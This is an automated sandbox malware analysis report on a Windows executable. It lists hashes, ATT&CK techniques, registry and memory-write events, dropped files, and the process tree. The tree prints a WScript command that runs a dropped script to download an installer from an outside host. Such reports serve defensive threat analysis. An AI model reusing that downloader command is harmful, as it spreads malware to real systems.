6e62836df0e98eab2e94e48aa6c4536417656edac11df5a857b05ce400603dc3

Analysis

max time kernel
117s
max time network
118s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
13/10/2024, 07:42

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

3e9dc8fbdc1982294d3072e659ab3a09_JaffaCakes118.exe
Size

184KB
MD5

3e9dc8fbdc1982294d3072e659ab3a09
SHA1

5ee06aabb71bfd63fd481da6f6e6e238e90daf2f
SHA256

6e62836df0e98eab2e94e48aa6c4536417656edac11df5a857b05ce400603dc3
SHA512

84c0ac340014d4fe5ffabc3f5454570d05fd03496bdb7a3bfe8591c3b636ed34ef13a43e98d01a52be26d57c43e0960f6054947b3cfe6373cb71287e30e5c29b
SSDEEP

3072:/MzsU0S0w8Hp9Rc/LB+dJGESR4hIRSYaVvb1NVFJNndnO3T:/7BSH8zUB+nGESaaRvoB7FJNndne

Score

8^/10

discovery execution

Malware Config

Signatures

Blocklisted process makes network request 11 IoCs

flow	pid	Process
6	1680	WScript.exe
8	1680	WScript.exe
10	1680	WScript.exe
13	2928	WScript.exe
14	2928	WScript.exe
16	2284	WScript.exe
17	2284	WScript.exe
20	2796	WScript.exe
21	2796	WScript.exe
23	2296	WScript.exe
24	2296	WScript.exe

Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 6 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	3e9dc8fbdc1982294d3072e659ab3a09_JaffaCakes118.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe

Suspicious use of WriteProcessMemory 20 IoCs

description	pid	Process	procid_target
PID 2480 wrote to memory of 1680	2480	3e9dc8fbdc1982294d3072e659ab3a09_JaffaCakes118.exe	31
PID 2480 wrote to memory of 1680	2480	3e9dc8fbdc1982294d3072e659ab3a09_JaffaCakes118.exe	31
PID 2480 wrote to memory of 1680	2480	3e9dc8fbdc1982294d3072e659ab3a09_JaffaCakes118.exe	31
PID 2480 wrote to memory of 1680	2480	3e9dc8fbdc1982294d3072e659ab3a09_JaffaCakes118.exe	31
PID 2480 wrote to memory of 2928	2480	3e9dc8fbdc1982294d3072e659ab3a09_JaffaCakes118.exe	33
PID 2480 wrote to memory of 2928	2480	3e9dc8fbdc1982294d3072e659ab3a09_JaffaCakes118.exe	33
PID 2480 wrote to memory of 2928	2480	3e9dc8fbdc1982294d3072e659ab3a09_JaffaCakes118.exe	33
PID 2480 wrote to memory of 2928	2480	3e9dc8fbdc1982294d3072e659ab3a09_JaffaCakes118.exe	33
PID 2480 wrote to memory of 2284	2480	3e9dc8fbdc1982294d3072e659ab3a09_JaffaCakes118.exe	35
PID 2480 wrote to memory of 2284	2480	3e9dc8fbdc1982294d3072e659ab3a09_JaffaCakes118.exe	35
PID 2480 wrote to memory of 2284	2480	3e9dc8fbdc1982294d3072e659ab3a09_JaffaCakes118.exe	35
PID 2480 wrote to memory of 2284	2480	3e9dc8fbdc1982294d3072e659ab3a09_JaffaCakes118.exe	35
PID 2480 wrote to memory of 2796	2480	3e9dc8fbdc1982294d3072e659ab3a09_JaffaCakes118.exe	37
PID 2480 wrote to memory of 2796	2480	3e9dc8fbdc1982294d3072e659ab3a09_JaffaCakes118.exe	37
PID 2480 wrote to memory of 2796	2480	3e9dc8fbdc1982294d3072e659ab3a09_JaffaCakes118.exe	37
PID 2480 wrote to memory of 2796	2480	3e9dc8fbdc1982294d3072e659ab3a09_JaffaCakes118.exe	37
PID 2480 wrote to memory of 2296	2480	3e9dc8fbdc1982294d3072e659ab3a09_JaffaCakes118.exe	39
PID 2480 wrote to memory of 2296	2480	3e9dc8fbdc1982294d3072e659ab3a09_JaffaCakes118.exe	39
PID 2480 wrote to memory of 2296	2480	3e9dc8fbdc1982294d3072e659ab3a09_JaffaCakes118.exe	39
PID 2480 wrote to memory of 2296	2480	3e9dc8fbdc1982294d3072e659ab3a09_JaffaCakes118.exe	39

C:\Users\Admin\AppData\Local\Temp\3e9dc8fbdc1982294d3072e659ab3a09_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\3e9dc8fbdc1982294d3072e659ab3a09_JaffaCakes118.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2480
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufE560.js" http://www.djapp.info/?domain=ODpoUrFgGj.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fufE560.exe
  2⤵
  - Blocklisted process makes network request
  - System Location Discovery: System Language Discovery
  PID:1680
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufE560.js" http://www.djapp.info/?domain=ODpoUrFgGj.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fufE560.exe
  2⤵
  - Blocklisted process makes network request
  - System Location Discovery: System Language Discovery
  PID:2928
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufE560.js" http://www.djapp.info/?domain=ODpoUrFgGj.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fufE560.exe
  2⤵
  - Blocklisted process makes network request
  - System Location Discovery: System Language Discovery
  PID:2284
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufE560.js" http://www.djapp.info/?domain=ODpoUrFgGj.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fufE560.exe
  2⤵
  - Blocklisted process makes network request
  - System Location Discovery: System Language Discovery
  PID:2796
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufE560.js" http://www.djapp.info/?domain=ODpoUrFgGj.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fufE560.exe
  2⤵
  - Blocklisted process makes network request
  - System Location Discovery: System Language Discovery
  PID:2296

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

JavaScript

T1059.007

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8B2B9A00839EED1DFDCCC3BFC2F5DF12

Filesize
1KB

MD5
67e486b2f148a3fca863728242b6273e

SHA1
452a84c183d7ea5b7c015b597e94af8eef66d44a

SHA256
facaf1c3a4bf232abce19a2d534e495b0d3adc7dbe3797d336249aa6f70adcfb

SHA512
d3a37da3bb10a9736dc03e8b2b49baceef5d73c026e2077b8ebc1b786f2c9b2f807e0aa13a5866cf3b3cafd2bc506242ef139c423eaffb050bbb87773e53881e

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B46811C17859FFB409CF0E904A4AA8F8

Filesize
436B

MD5
971c514f84bba0785f80aa1c23edfd79

SHA1
732acea710a87530c6b08ecdf32a110d254a54c8

SHA256
f157ed17fcaf8837fa82f8b69973848c9b10a02636848f995698212a08f31895

SHA512
43dc1425d80e170c645a3e3bb56da8c3acd31bd637329e9e37094ac346ac85434df4edcdbefc05ae00aea33a80a88e2af695997a495611217fe6706075a63c58

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8B2B9A00839EED1DFDCCC3BFC2F5DF12

Filesize
174B

MD5
da46b6208640a57a0b4fae29771d12a7

SHA1
484708986d76f52de7fb4d9e24a4073fabbcfe5b

SHA256
a759d04b383789ad88e5e462d7e7b0996583f6d6bc143b67c2a5b6b034914a55

SHA512
3d070765279632979e6b6b26c9422f2a4b8d5d50576853c8bb4e132e719568076c1a19e589cb013742b0b89a339d15cb8b36b6e70cbd7f4b70ee35ccc6350a74

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B46811C17859FFB409CF0E904A4AA8F8

Filesize
170B

MD5
4eaff859a8539d36f1d6e3b92e0d6c92

SHA1
e821bf9ca212848d0b125a0aa877079f3a745211

SHA256
f152ffcd8a5007736658235b949d96d4b6e1601d7a6544c8e514aec5960e9c43

SHA512
83db36456b22dda996e5ead5346f69621f58c99008f68c392cfba6af49f13f9f11017f1b458db3c9b21196a8feaffd703b612771540fe8f3432ca55527ed176d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\AS91FDNI\domain_profile[1].htm

Filesize
40KB

MD5
6dd6e2704b74dd7ab98945ab01fb0873

SHA1
ae85e7b6d8c43e44d020d54d60b1f6fe9dafe692

SHA256
811a14b22e6527b6a3e89ce5de115a7d06cd4ee2b676bc0ecff95088cb965233

SHA512
2121be5ab70a70ddf2e26063962449a2642680bff8f12b8ad6db2b550cfb2894b01f04c3227961142cfb6062fb4e8852c54ab74b3b405d36e4a4e31a3cae9289

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\AS91FDNI\domain_profile[1].htm

Filesize
40KB

MD5
2eee82717a5b8c2d185900e3847df40b

SHA1
5fdb3268d23f8448f49d936c84854cd05613ce55

SHA256
489c8eb68499e7d42c28e0ce639802de375b8da82a3ac8b4eec6f77bf77a7229

SHA512
587fdad9cae7f943d94623f7eb38ca97e4f48a011d04292015090c4e5d1314a17c9c2e96710953b767ac9b581c90fc46e3dce963d9613f5754380e3bdb8a6c67

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\AS91FDNI\domain_profile[1].htm

Filesize
40KB

MD5
94beeebed3d82061952bc733d039923b

SHA1
03c49686cc1d6e1847ed900831b38c5cd24ec965

SHA256
ea45965824d7589eff98d25394f4e24b986d678825b1b7e938a0a884aac3c71f

SHA512
d58c7fa22cf2c5aaf4b8929f2a97b88a5f00d34308db299818dcfab103f48f3937b83856b09b374fd236be1a372894e10c13997d40efcafb3794dc283e9b31ce

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\S8GI6B9B\domain_profile[1].htm

Filesize
40KB

MD5
02fe6e212778ceed8212c51eff739ebc

SHA1
c76e16e5f969f1d948b92599f7ac701f684fa24c

SHA256
7a994177240149d5fc142396da42fce34ea7f7e591d05f8a6113769e6af99491

SHA512
32a8ac4a354531e79d4ab56d70b1fbca55b464aa190782d0c891671b5fa8d391e81117d033bd11dd1f4aa4ce6dadb178909d1264c48d2f32c793a10ac8366f99

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\S8GI6B9B\domain_profile[1].htm

Filesize
40KB

MD5
5ff3c50bc308adb47c80dc7d7b0f54c8

SHA1
d23bc46d7161c745400c533548a7cab9013bc498

SHA256
61d54e83388d3c2316d55f3a89d6640baa7493451c17df4dfa17ddf62b0a4bfb

SHA512
96659d68b6036976f70d43e41b5fe572919d4b4d713ec62275822fe7820b35601cf44715add5b88bc03bc1c899ba9e319bc9fe45023c26daaf50d571e614eada

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab2D09.tmp

Filesize
70KB

MD5
49aebf8cbd62d92ac215b2923fb1b9f5

SHA1
1723be06719828dda65ad804298d0431f6aff976

SHA256
b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

SHA512
bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar454B.tmp

Filesize
181KB

MD5
4ea6026cf93ec6338144661bf1202cd1

SHA1
a1dec9044f750ad887935a01430bf49322fbdcb7

SHA256
8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

SHA512
6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

Download Submit
C:\Users\Admin\AppData\Local\Temp\fufE560.js

Filesize
3KB

MD5
3813cab188d1de6f92f8b82c2059991b

SHA1
4807cc6ea087a788e6bb8ebdf63c9d2a859aa4cb

SHA256
a3c5baef033d6a5ab2babddcfc70fffe5cfbcef04f9a57f60ddf21a2ea0a876e

SHA512
83b0c0ed660b29d1b99111e8a3f37cc1d2e7bada86a2a10ecaacb81b43fad2ec94da6707a26e5ae94d3ce48aa8fc766439df09a6619418f98a215b9d9a6e4d76

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\NLB4A9VD.txt

Filesize
175B

MD5
4a1a0182c2cef314a801b5134db2324e

SHA1
287ca3c82250e4867237cd74c7e570a80736960a

SHA256
1174cf47c5a871da11c5a5e5e17925237dd01e69833c73c54b023857ea4c3a3b

SHA512
788ee7e0e6e4b227306f676768d0ae600de1cb9a8fd922301c3572d226ae2f0f3fce0c1e80fb7131b9b1f72d22cc7e1a16e14dcbbc55e34f9b43d8dc785ee10a

Download Submit